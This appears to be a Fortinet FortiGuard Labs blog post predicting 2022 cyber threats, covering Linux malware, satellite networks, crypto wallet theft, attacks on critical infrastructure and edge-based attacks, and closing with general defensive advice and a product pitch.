In 2022, threats are unlikely to slow down. In fact, our experts predicted cyberattacks will increase in 2022. This is unfortunate news especially as the attack surface continues to expand.
For organizations struggling to integrate and manage a collection of single-purpose products, the resulting complexity and lack of visibility is likely to leave these organizations at risk. They must work to resolve these security gaps as quickly as possible – but they need to know where to focus.
More than half of organizations face gaps in their zero trust implementations
Ransomware attacks grew tenfold between July 2020 and July 2021
51% of organizations experienced operational technology (OT) attacks that impacted productivity, and 45% experienced OT attacks that endangered an employee’s physical safety.
Despite many organizations putting their best foot forward to protect their networks, they still face risks. Minimizing this risk will require them to start preparing for emerging cyberthreats today. And while no one can predict the future, here are five up-and-coming threats we're keeping an eye on at FortiGuard Labs.
Up until recently, Linux has been largely ignored by cybercriminals, but that's changing. Because Linux runs the back-end systems of many networks and container-based solutions for IoT devices and mission-critical applications, it's becoming a more popular target for attackers. At this point, attacks against Linux operating systems and applications running on those systems are as prevalent as attacks on Windows operating systems.
Many organizations are used to defending against Windows attacks but aren't accustomed to keeping up with Linux from a defensive and malware analysis standpoint in comparison to Windows. Even worse, Linux environments often have valuable data like Secure Socket Shell (SSH) credentials, certificates, applications usernames, and passwords.
A malicious implementation of the Beacon feature of Cobalt Strike called Vermilion Strike can target Linux systems with remote access capabilities without being detected. Now that Microsoft is actively integrating Windows Subsystem for Linux (WSL) into Windows 11, it's inevitable that malware will follow. WSL is a compatibility layer that is used for running Linux binary executables natively on Windows. An increase in botnet malware is being written for Linux platforms as well. The recent Log4J vulnerability is also a good example of a recent attack where we are seeing Linux binaries capitalize on the opportunity.
As connectivity using satellite internet increases, the likelihood of new exploits targeting these networks will increase correspondingly. At this point, about a half dozen major satellite internet providers are already in place. The biggest targets will be organizations that rely on satellite-based connectivity to support low-latency activities, like online gaming or delivering critical services to remote locations, as well as remote field offices, pipelines, or cruises and airlines. This will also expand the potential attack surface as organizations add satellite networks to connect previously off-grid systems, such as remote OT devices, to their interconnected networks.
In an increasingly digitized world, crypto wallets are a new risk as more malware designed to target stored information means attackers can steal credentials such as a bitcoin private key, bitcoin address, crypto wallet address, and other significant information. They then can drain the digital wallet. Attacks often start as a phishing campaign that uses the classic strategy of attaching a malicious Microsoft Word document to a spam email. The malware is delivered by a Word document macro that is designed to steal crypto wallet information and credentials from the victims’ infected devices.
Along the same lines, a new fake Amazon gift card generator targets digital wallets by replacing the victim’s wallet with that of the attacker. And a new remote access trojan (RAT) called ElectroRAT targets cryptocurrency. It combines social engineering with custom cryptocurrency applications and has the ability to perform keylogging, take screenshots, upload and download files, and execute commands.
Ransomware attacks are increasingly targeting critical infrastructure and the phrase “killware” has been used to describe some of these incidents. Although the attacks don't necessarily target human lives directly, the term is used because the malware that disrupts hospitals, pipelines, water treatment plants, and other critical infrastructure is different from regular exploits because of the direct impact they can have on people.
Cybercriminals may be moving away from smaller targets toward larger more public attacks that affect the physical world, including supply chains and a large number of human victims. The near-universal convergence of IT and OT networks has made it easier for attackers to access OT systems through compromised home networks and devices of remote workers. Adding to the risk is the fact that attackers no longer have to have specialized technical knowledge of ICS and SCADA systems because now they can buy attack kits on the dark web.
The increase in the number of people working remotely has exposed corporate networks to many of the threats to residential networks. The increase in network edges means there are more places for "living off the land"-type threats to hide. With this technique, attackers use malware made from existing toolsets and capabilities within compromised environments so their attacks and data exfiltration look like normal system activity. Living off the land attacks also may be combined with edge access trojans (EATs), so new attacks will live off the edge, not just the land. While avoiding detection, the malware located in these edge environments can use local resources to keep an eye on activities and data at the edge and then steal, hijack, or even ransom critical systems, applications, and information.
To prepare for 2022, organizations should certainly make it a priority to harden both Linux and Windows-based systems. And when adopting new technology, organizations should always take a security-first approach; in other words, before adding new connections such as satellite-based connectivity, make sure it's protected.
But you must also keep in mind the fact that cybercriminals will continue using tactics as long as they keep working. Along with preparing for new threats, you can't forget about what's already out there. Defending against both new and existing threats requires an integrated approach to security. To fight today's evolving threats, organizations should look into a security platform based on a cybersecurity mesh architecture with security solutions that are designed to work together.
Learn more about upcoming threat trends in the full Threat Predictions perspective from Fortinet’s FortiGuard Labs team.